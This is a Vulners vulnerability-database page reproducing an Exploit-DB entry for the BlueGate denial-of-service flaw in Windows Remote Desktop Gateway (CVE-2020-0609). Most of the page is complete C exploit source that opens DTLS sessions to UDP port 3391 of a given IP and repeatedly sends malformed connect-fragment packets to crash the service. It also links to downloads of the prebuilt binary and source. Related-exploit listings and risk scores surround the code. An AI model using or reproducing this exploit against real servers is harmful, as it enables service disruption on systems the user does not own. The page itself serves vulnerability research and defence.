Vulners
Lucene search
Remote Desktop Gateway - (BlueGate) Denial of Service Exploit
| Reporter | Title | Published | Views | Family All 65 |
|---|---|---|---|---|
 | Exploit for CVE-2020-0609 | 24 Jan 202003:52 | – | githubexploit |
| Exploit for CVE-2020-0609 | 24 Jan 202015:39 | – | githubexploit |
| Exploit for CVE-2020-0609 | 23 Jan 202022:29 | – | githubexploit |
| Exploit for Insufficiently Protected Credentials in Zyxel Usg20-Vpn_Firmware | 4 Jan 202100:56 | – | githubexploit |
| Exploit for CVE-2020-0609 | 23 Jan 202022:29 | – | githubexploit |
| Exploit for CVE-2020-0609 | 21 Jan 202021:33 | – | githubexploit |
| Exploit for CVE-2020-0610 | 3 Sep 202503:59 | – | githubexploit |
 | Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform | 8 Dec 202020:38 | – | gitee |
| Exploit for CVE-2020-0609 | 27 Jul 202504:02 | – | gitee |
 | Critical Vulnerabilities in Microsoft Windows Operating Systems | 14 Jan 202012:00 | – | ics |
10
#include "BlueGate.h"
/*
EDB Note:
- Download (Binary) ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47964-1.exe
- Download (Source) ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47964-2.zip
*/
void error(const char* msg)
{
printf("ERROR: %s\n", msg);
exit(EXIT_FAILURE);
}
void SOCKInit()
{
WSADATA wsaData;
int res;
res = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (res != 0)
error("WSAStartup failed");
}
void DTLSInit()
{
SSL_library_init();
SSL_load_error_strings();
ERR_load_BIO_strings();
OpenSSL_add_all_algorithms();
}
int OpenUDPConnection(const char* hostname, int port)
{
int sockfd;
sockaddr_in addr;
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd < 0)
error("Failed to open socket");
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
inet_pton(AF_INET, hostname, &(addr.sin_addr));
if (connect(sockfd, (struct sockaddr*) & addr, sizeof(addr)) != 0)
{
closesocket(sockfd);
error("Failed to connect socket");
}
return sockfd;
}
SSL* DTLSConnection(const char* hostname)
{
int sockfd;
int result;
DTLSParams client;
sockfd = OpenUDPConnection(hostname, 3391);
client.ctx = SSL_CTX_new(DTLS_client_method());
client.bio = BIO_new_ssl_connect(client.ctx);
BIO_set_conn_hostname(client.bio, hostname);
BIO_get_ssl(client.bio, &(client.ssl));
SSL_set_connect_state(client.ssl);
SSL_set_mode(client.ssl, SSL_MODE_AUTO_RETRY);
SSL_set_fd(client.ssl, sockfd);
if (SSL_connect(client.ssl) != 1) {
return NULL;
}
return client.ssl;
}
int send_dos_packet(SSL* ssl, int id) {
CONNECT_PKT_FRAGMENT packet;
packet.hdr.pktID = PKT_TYPE_CONNECT_REQ_FRAGMENT;
packet.hdr.pktLen = sizeof(CONNECT_PKT_FRAGMENT) - sizeof(UDP_PACKET_HEADER);
packet.usFragmentID = id;
packet.usNoOfFragments = id;
packet.cbFragmentLength = 1000;
memset(packet.fragment, 0x41, 1000);
char pkt[sizeof(packet)];
memcpy(&pkt, &packet, sizeof(packet));
return SSL_write(ssl, pkt, sizeof(pkt));
}
int main(int argc, char* argv[])
{
SSL* ssl;
int i = 0;
char* hostname;
if (argc != 2) {
printf("Usage: %s <IP address>\n", argv[0]);
return 0;
}
hostname = argv[1];
SOCKInit();
DTLSInit();
while (i++ > -1) {
ssl = DTLSConnection(hostname);
if (ssl == NULL) {
break;
}
for (int n = 0; n < 4; n++) {
send_dos_packet(ssl, i+n);
printf("Sending packet [%u]\n", i + n);
}
i++;
}
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jan 2020 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 210
CVSS 3.19.8
EPSS0.8877